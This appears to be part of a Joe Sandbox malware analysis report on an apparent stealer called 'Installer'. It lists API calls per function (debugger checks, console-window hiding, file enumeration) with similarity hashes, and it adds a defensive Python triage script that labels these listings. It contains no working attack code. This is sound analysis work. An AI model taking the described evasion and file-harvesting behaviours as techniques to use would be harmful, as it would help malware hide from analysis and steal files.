                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2701053895-0
                                                                                                                                                                                                                                                    • Opcode ID: be05d70df6dad39d131d79bbbcf536c13b2e18273427b9170b5af2408e0bbb55
                                                                                                                                                                                                                                                    • Instruction ID: 3e02cdc9103431127cf7262fcf6b3c7eccb4f0283e9adc2ad846bf70f5e8e01a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be05d70df6dad39d131d79bbbcf536c13b2e18273427b9170b5af2408e0bbb55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15515571904508AFDF269F289C85ABFB7B9DF45344F1A829DF8089B209EB308D419B60
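A triage note on the two API listings above. The function at 0034F8F5 calls IsProcessorFeaturePresent(0x17) (PF_FASTFAIL_AVAILABLE), then IsDebuggerPresent, SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter in that order. That is the shape of the MSVC runtime's fast-fail reporting helper that the compiler links into every MSVC-built binary, so the "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature from the overview is weak evidence when it fires on this function alone; the FindFirstFileExW/FindNextFileW/FindClose loop at 003620D9 is ordinary directory enumeration that could belong to either the runtime or the stealer's file harvesting and needs a look at its callers. The script below is an added example, not Joe Sandbox code: it parses per-function "APIs" listings in the format shown on this page and labels each function by these patterns. The sample text embeds the two listings above verbatim plus one constructed third function (address 00401234 is hypothetical) to show the contrasting case.

```python
"""Label Joe Sandbox per-function API listings (added example, not Joe Sandbox code)."""
import re

# Constructed sample: the first two functions are copied from this report,
# the third (ref 00401234) is hypothetical and exists only to show the contrast.
SAMPLE = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0034F8F5
• IsDebuggerPresent.KERNEL32 ref: 0034F9C1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034F9DA
• UnhandledExceptionFilter.KERNEL32(?), ref: 0034F9E4
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
APIs
  • Part of subcall function 0035D2B4: HeapAlloc.KERNEL32(00000008,00343D4A,00000018,?,0035C308,00000001,00000364,00000018,FFFFFFFF,000000FF,?,003576E9,0035BF54,00000000,?,0034A67D), ref: 0035D2F5
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003620D9
• FindNextFileW.KERNEL32(00000000,?), ref: 003621CD
• FindClose.KERNEL32(00000000), ref: 0036220C
• FindClose.KERNEL32(00000000), ref: 0036223F
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32 ref: 00401234
• ExitProcess.KERNEL32(00000000), ref: 00401250
Memory Dump Source
"""

# One "• Api.MODULE(args), ref: ADDR" line; the subcall prefix and the
# argument list are both optional (IsDebuggerPresent is listed without either).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# PF_FASTFAIL_AVAILABLE is 23 (0x17): the IsProcessorFeaturePresent(0x17)
# probe that precedes the calls below is what marks the CRT reporting helper.
CRT_FASTFAIL = {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}


def parse_api_groups(text):
    """Return one dict per 'APIs' block, each holding its parsed API entries."""
    groups, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": []}
            groups.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None  # block ends; metadata that follows is not an API line
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["args"] = [a for a in (entry["args"] or "").split(",") if a]
            current["apis"].append(entry)
    return groups


def first_ref(group):
    """Address of the first call made by the function itself (not a subcall)."""
    own = [e for e in group["apis"] if not e["subcall"]]
    return (own or group["apis"])[0]["ref"]


def classify(group):
    apis = {e["api"] for e in group["apis"]}
    # IsDebuggerPresent next to SetUnhandledExceptionFilter(NULL) and
    # UnhandledExceptionFilter is the MSVC fast-fail reporting path, not anti-debug.
    if CRT_FASTFAIL <= apis and any(
        e["api"] == "SetUnhandledExceptionFilter" and e["args"] == ["00000000"]
        for e in group["apis"]
    ):
        return "crt-fastfail-report"
    if apis & {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}:
        return "anti-debug-candidate"  # still needs a human look at what the result gates
    if apis & {"FindFirstFileExW", "FindFirstFileW"} and "FindNextFileW" in apis:
        return "directory-enumeration"
    return "other"


def triage(text):
    """List of (first call address, label) for every non-empty APIs block."""
    return [(first_ref(g), classify(g)) for g in parse_api_groups(text) if g["apis"]]


if __name__ == "__main__":
    for ref, label in triage(SAMPLE):
        print(f"{ref}  {label}")
```

Run it on a report section copied to a file and the "crt-fastfail-report" rows can be dropped from the anti-debug review queue; only the "anti-debug-candidate" rows are worth opening in the dump, and the enumeration rows are worth checking for the wildcard strings reaching FindFirstFileExW.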
APIs
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: 8fa0adf9177e6b75d54d452e02e24c1cd3bf77f15769d132b19037a72e0fab77
• Instruction ID: 5076cf65ebc588612f83fa1d6c84799eb5fa9aa2ee3c53fb5feb4612db0b439f
• Opcode Fuzzy Hash: 8fa0adf9177e6b75d54d452e02e24c1cd3bf77f15769d132b19037a72e0fab77
• Instruction Fuzzy Hash: AF710572900A096FDF239E648C51FAF77BAEF45311F2A8055E904BB295E735DC408F62
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0034FE70
• __alloca_probe_16.LIBCMT ref: 0034FE9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0034FEDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034FEF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0034FF37
• __alloca_probe_16.LIBCMT ref: 0034FF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0034FF96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0034FFB9
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
• Instruction ID: 50f55af91fd02c9c5451e34386ab74c70a058d26adf95e89798d6d107f7a4883
• Opcode Fuzzy Hash: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
• Instruction Fuzzy Hash: 65519D7260061AAFEB225F60CC45FAB7BE9EF45750F1A443AFD15DE1A0D730AC548B50
APIs
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: 96f4aed62ae2d163a8404596f163b5eceafb0931b0bd98938af56fa7f48f2c9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB16872A003559FDB178F24CC81FAE7BB5EF19311F1A4165EC44AF292D6749E09C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350D77
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00350D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00350E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 83d65296d9c1f32a391af9a148a5ccf8ffdb563598edadcec49046a085388385
                                                                                                                                                                                                                                                    • Instruction ID: c6287b19c1afe775174186bed26e7265ea659ccbdde235811069c73e79348750
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83d65296d9c1f32a391af9a148a5ccf8ffdb563598edadcec49046a085388385
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50410534A006189BCF17DF68C886E9EBBF5AF45311F258455ED186F362D732AD09CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CA5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CBF
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343CE0
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00343D92
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343DD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID: e.7
                                                                                                                                                                                                                                                    • API String ID: 3087743877-48725242
                                                                                                                                                                                                                                                    • Opcode ID: 5d4835d15f0e1cbd73eefeed43dcc13759f11e729d521fd42f981f292b60d987
                                                                                                                                                                                                                                                    • Instruction ID: 5f421ebfc39ebd575b3ee4ae95ba7811c64cb0905f9056809b7b848e2f241394
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4835d15f0e1cbd73eefeed43dcc13759f11e729d521fd42f981f292b60d987
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43412471E006188FCB26DF98D845BAEB7F5BB88720F058219D8196F391DB35AA41CF91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 003424DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 003424E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00342524
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0034259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3956949563-0
                                                                                                                                                                                                                                                    • Opcode ID: 0db8c3b5bcdb0c04f8dde73cec30c985d1d0c51d04760aa19b33e6c09c7a1102
                                                                                                                                                                                                                                                    • Instruction ID: 2c8a740766a7d515d8ecb75ffee1ce2b2aa4b59a0e0ed38ab1b06a6d59380b5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0db8c3b5bcdb0c04f8dde73cec30c985d1d0c51d04760aa19b33e6c09c7a1102
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 472174F2D402159BDF12AF949C06BDFBAF8AF04710F080165F9087E291E7B6B554CBA6
                                                                                                                                                                                                                                                    APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0035D01A,00341170,0034AA08,?,?), ref: 0035CFCC
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00350086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00350094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 003500A5
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00349C97
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CA8
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CBC
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CDD
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CEE
• std::_Throw_Cpp_error.LIBCPMT ref: 00349D06
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
APIs
• GetLastError.KERNEL32(?,?,0035ACDE,00350760,0034B77F,BB40E64E,?,?,?,?,0036BFCA,000000FF), ref: 0035ACF5
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035AD03
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0035AD1C
• SetLastError.KERNEL32(00000000,?,0035ACDE,00350760,0034B77F,BB40E64E,?,?,?,?,0036BFCA,000000FF), ref: 0035AD6E
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 0035B68D
• CallUnexpected.LIBVCRUNTIME ref: 0035B906
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: e28fffb52756845bef3db5280c118e9d3f393887d4dfc0443f813dd341aed89e
                                                                                                                                                                                                                                                    • Instruction ID: e6d74ff29051f218c6f1ecf89e93e4d02282d616f5121435d9f7b79ddc995546
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e28fffb52756845bef3db5280c118e9d3f393887d4dfc0443f813dd341aed89e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24B14871800209EFCF1ADFA4C881DAEB7B9BF04312F16455AEC11AB222D731DA59DB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034BF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034C028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 868a1655a2f8a1b924dbc61b8e2d3783b835c1ff00188c832ee9586cdcc75f49
                                                                                                                                                                                                                                                    • Instruction ID: 7c14c02b99a1ba0353c90b5d36609c42d46d2b1127f6db6f30b5955878be6de1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 868a1655a2f8a1b924dbc61b8e2d3783b835c1ff00188c832ee9586cdcc75f49
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7418974900209DFCB2ADF68C9459ADF7F9AF48300B59805DE44AAF652C734FA49CB52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 003555F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 0035560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 0035562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction ID: 9ca96c35f5db8de7898aaacfd38ee1185af3acd93c890fd304eff3a5ecef789c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01DB31600A55AFDB239F44DC15FEEB7BCFB04715F014525F815A22A0DB789944CA50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D89F
                                                                                                                                                                                                                                                      • Part of subcall function 0035BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0034A67D,00000018,?,00343D4A,00000018,00000000), ref: 0035BF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
